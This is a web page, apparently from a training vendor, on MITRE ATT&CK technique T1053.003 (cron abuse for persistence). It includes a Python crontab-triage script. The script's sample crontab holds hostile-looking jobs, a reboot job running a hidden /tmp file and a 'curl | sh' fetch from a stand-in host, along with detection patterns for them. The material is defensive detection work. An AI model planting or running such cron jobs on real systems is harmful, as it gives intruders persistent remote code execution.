- Tactics: Execution, Persistence, Privilege Escalation
- Platforms: Linux, macOS, ESXi
- Reference: attack.mitre.org/techniques/T1053.003
Description
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for Persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root).(Citation: CloudSEK ESXiArgs 2023)
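For detection work, the crontab format described above can be parsed and each job triaged. The following is an added example, not part of the ATT&CK entry or GTK Cyber's material: the `parse_crontab` helper, the heuristic names and patterns, and the sample crontab are all assumptions constructed for illustration.

```python
import re

# Triage heuristics: illustrative assumptions, not taken from the ATT&CK entry.
SUSPICIOUS = {
    "runs_from_temp_dir": re.compile(r"(^|[\s;|&])/(tmp|var/tmp|dev/shm)/"),
    "download_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da|z)?sh\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # e.g. MAILTO=root

# Constructed sample crontab, not from a real host.
SAMPLE = """\
# nightly backup
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh --full
@reboot /tmp/.cache/updater
*/10 * * * * curl -s http://example.invalid/a | sh
bad line
"""

def parse_crontab(text, system=False):
    """Return one dict per job line. system=True parses the /etc/crontab
    layout, which carries a user field between schedule and command."""
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue  # blank lines, comments and environment settings are not jobs
        n_sched = 1 if line.startswith("@") else 5  # @reboot etc. vs five time fields
        n_head = n_sched + (1 if system else 0)
        parts = line.split(None, n_head)
        if len(parts) != n_head + 1:
            jobs.append({"line": lineno, "error": "malformed", "raw": line})
            continue
        schedule, command = " ".join(parts[:n_sched]), parts[-1]
        flags = [name for name, rx in SUSPICIOUS.items() if rx.search(command)]
        if schedule == "@reboot":
            flags.insert(0, "runs_at_startup")  # startup execution, as the text describes
        jobs.append({"line": lineno, "schedule": schedule,
                     "user": parts[n_sched] if system else None,
                     "command": command, "flags": flags})
    return jobs

if __name__ == "__main__":
    for job in parse_crontab(SAMPLE):
        if job.get("flags") or job.get("error"):
            print(job)
```

Flags are triage hints for an analyst to review, not verdicts; malformed lines are reported rather than dropped so that a hand-edited crontab does not hide an entry from the review.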
How GTK Cyber trains on this
GTK Cyber's hands-on training programs cover detection engineering across the MITRE ATT&CK framework, including the Execution, Persistence, and Privilege Escalation tactics this technique falls under. Our practitioner-led courses focus on building real detections, not just memorizing technique IDs.
Related techniques
- T1037 — Boot or Logon Initialization Scripts
- T1047 — Windows Management Instrumentation
- T1053 — Scheduled Task/Job
- T1055 — Process Injection
- T1059 — Command and Scripting Interpreter
- T1068 — Exploitation for Privilege Escalation
- T1072 — Software Deployment Tools
- T1078 — Valid Accounts
- T1098 — Account Manipulation
- T1106 — Native API
- T1112 — Modify Registry
- T1127 — Trusted Developer Utilities Proxy Execution